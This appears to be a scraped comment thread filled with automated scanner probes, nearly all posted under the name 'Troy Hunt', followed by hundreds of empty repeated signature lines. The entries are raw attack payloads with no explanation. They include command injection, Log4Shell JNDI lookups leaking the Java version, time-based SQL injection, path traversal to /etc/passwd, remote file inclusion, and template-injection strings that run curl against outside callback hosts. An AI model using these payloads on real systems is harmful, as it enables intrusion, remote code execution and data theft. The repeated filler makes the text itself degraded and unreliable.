Esteban Gutiérrez
Is this for real?!
Troy Hunt
echo hIfE4S5cp8
Troy Hunt
sleep 10
Troy Hunt
ping -n 11 127.0.0.1
Troy Hunt
sleep(bindec(decbin(10)))
Troy Hunt
file_get_contents("http://kgvxwnouecenoraimvxnyab"."wggavkh2ss.szp.prbly.win")
Troy Hunt
?>
Troy Hunt
?>
Troy Hunt
.sleep(bindec(decbin(10)))
Troy Hunt
.file_get_contents("http://kgvxwnouecenoraimvxn9hs"."w2sdv0cu77.szp.prbly.win")
Troy Hunt
+sleep(bindec(decbin(10)))
Troy Hunt
+file_get_contents("http://kgvxwnouecenoraimvxnohl"."8ypu7bgicf.szp.prbly.win")
Troy Hunt
".sleep(bindec(decbin(10)))."
Troy Hunt
".file_get_contents("http://kgvxwnouecenoraimvxnlon"."44yl982fb6.szp.prbly.win")."
Troy Hunt
(function(){var w=new Date().getTime()+10000;while(new Date().getTime()
Troy Hunt
"+(function(){var w=new Date().getTime()+10000;while(new Date().getTime()
Troy Hunt
(__import__("time").sleep(10))
Troy Hunt
(__import__("urllib").request.urlopen("http://kgvxwnouecenoraimvxnggk"+"6zjtwnzijt.szp.prbly.win"))
Troy Hunt
"+(__import__("time").sleep(10))+"
Troy Hunt
"+(__import__("urllib").request.urlopen("http://kgvxwnouecenoraimvxn4y7"+"2o3fn5b3sh.szp.prbly.win"))+"
Troy Hunt
${jndi:ldap://127.0.0.1#${sys:java.version}.kgvxwnouecenoraimvxnoef${lower:b}d5lix8uy2.szp.prbly.win:1389/abc}
Troy Hunt
${jndi:ldap://127.0.0.1#${sys:java.version}.kgvxwnouecenoraimvxnhts${lower:9}s38hp88cg.szp.prbly.win/abc}
Troy Hunt
${jndi:dns://${sys:java.version}.kgvxwnouecenoraimvxniow${lower:i}cdb9jtija.szp.prbly.win/abc}
Troy Hunt
${jndi:ldap://${sys:java.version}.kgvxwnouecenoraimvxn17y${lower:f}sqebgpz43.szp.prbly.win/abc}
Troy Hunt
${j${lower:n}di:r${lower:m}i://${sys:java.version}.kgvxwnouecenoraimvxnibv${lower:d}ufouucril.szp.prbly.win/abc}
Troy Hunt
${${lower:j}ndi:${lower:l}dap://${sys:java.version}.kgvxwnouecenoraimvxnzqk${lower:f}3gvw1qt0r.szp.prbly.win/abc}
Troy Hunt
" / sleep(10) / "
Troy Hunt
case when cast(pg_sleep(10) as varchar) > ' then 0 else 1 end
Troy Hunt
case when cast(pg_sleep(10) as varchar) > ' then 0 else 1 end --
Troy Hunt
"case when cast(pg_sleep(10) as varchar) > ' then 0 else 1 end --
Troy Hunt
case (7+1)+1+(993445379) when not null then 1 else 1 end
Troy Hunt
case randomblob(993140521) when not null then 1 else 1 end
Troy Hunt
" | case (6+2)+3+(996770344) when not null then "" else "" end | "
Troy Hunt
" | case randomblob(996582913) when not null then "" else "" end | "
Troy Hunt
case (4-1)-4-(995657158) when not null then 1 else 1 end --
Troy Hunt
case randomblob(992995612) when not null then 1 else 1 end --
Troy Hunt
" | case (4-3)+6+(991402386) when not null then "" else "" end --
Troy Hunt
" | case randomblob(996125051) when not null then "" else "" end --
Troy Hunt
J0o5Tx5s
Troy Hunt
c:/Windows/system.ini
Troy Hunt
/../../../../../../../../../../../../../../../../Windows/system.ini
Troy Hunt
Windows/system.ini
Troy Hunt
file:///c:/Windows/system.ini
Troy Hunt
c:\Windows\system.ini
Troy Hunt
../../../../../../../../../../../../../../../../Windows/system.ini
Troy Hunt
/etc/passwd
Troy Hunt
/../../../../../../../../../../../../../../../../etc/passwd
Troy Hunt
/proc/meminfo
Troy Hunt
../../../../../../../../../../../../../../../../etc/passwd
Troy Hunt
etc/passwd
Troy Hunt
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Troy Hunt
.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/passwd
Troy Hunt
http://szp.prbly.win/s/rfi1
Troy Hunt
szp.prbly.win/s/rfi1
Troy Hunt
https://szp.prbly.win/s/rfi1
Troy Hunt
http://kgvxwnouecenoraimvxnyynw5wvdk0xxj.szp.prbly.win
Troy Hunt
kgvxwnouecenoraimvxnu5vsgvaybjt5o.szp.prbly.win
Troy Hunt
https://kgvxwnouecenoraimvxnxjakybrax7zya.szp.prbly.win
Troy Hunt
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("sleep 10") }
Troy Hunt
#set($engine="") #set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("sleep 10")) #set($null=$proc.waitFor()) ${null}
Troy Hunt
[[${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("sleep 10").waitFor()}]]
Troy Hunt
${script:javascript:java.lang.Runtime.getRuntime().exec("sleep 10").waitFor()}
Troy Hunt
{{"".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("sleep 10")}}
Troy Hunt
${__import__("subprocess").check_output("sleep 10", shell=True)}
Troy Hunt
{{__import__("subprocess").check_output("sleep 10", shell=True)}}
Troy Hunt
<%=system("sleep 10")%>
Troy Hunt
#{system("sleep 10")}
Troy Hunt
{system("sleep 10")}
Troy Hunt
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("curl http://kgvxwnouecenoraimvxnkzf"+"on8lgoteyw.szp.prbly.win") }
Troy Hunt
#set($engine="") #set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://kgvxwnouecenoraimvxnoaw"+"oe78rrqvoj.szp.prbly.win")) #set($null=$proc.waitFor()) ${null}
Troy Hunt
[[${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("curl http://kgvxwnouecenoraimvxnkd9"+"pmjkttq5mc.szp.prbly.win").waitFor()}]]
Troy Hunt
${script:javascript:java.lang.Runtime.getRuntime().exec("curl http://kgvxwnouecenoraimvxnboz"+"tfsssayqeo.szp.prbly.win").waitFor()}
Troy Hunt
{{"".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("curl http://kgvxwnouecenoraimvxn7qo"+"f05u7etovl.szp.prbly.win")}}
Troy Hunt
${__import__("subprocess").check_output("curl http://kgvxwnouecenoraimvxnrls"+"way1trdnbp.szp.prbly.win", shell=True)}
Troy Hunt
{{__import__("subprocess").check_output("curl http://kgvxwnouecenoraimvxnkyn"+"8cv6uchrri.szp.prbly.win", shell=True)}}
Troy Hunt
<%=system("curl http://kgvxwnouecenoraimvxn3qj"+"tesuv9fsmi.szp.prbly.win")%>
Troy Hunt
#{system("curl http://kgvxwnouecenoraimvxnfwb"+"hlzsgsggva.szp.prbly.win")}
Troy Hunt
{system("curl http://kgvxwnouecenoraimvxn8md{""}roeac2rwpt.szp.prbly.win")}
Troy Hunt
6560620614218629743.whatdoesascannersee.com
Troy Hunt
http://6560620614218629743.whatdoesascannersee.com
Troy Hunt
https://6560620614218629743.whatdoesascannersee.com
Troy Hunt
.6560620614218629743.whatdoesascannersee.com
Troy Hunt
//6560620614218629743.whatdoesascannersee.com
Troy Hunt
\\6560620614218629743.whatdoesascannersee.com
Troy Hunt
pRrLlY2KMcWNgq6elloyDsS
Troy Hunt
eUTSSm2W
Troy Hunt
J0o5Tx5s
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
Troy Hunt
ueidyer rfnth shihe
Troy Hunt
<%={{={@{#{${zj}}%>
Troy Hunt
test test1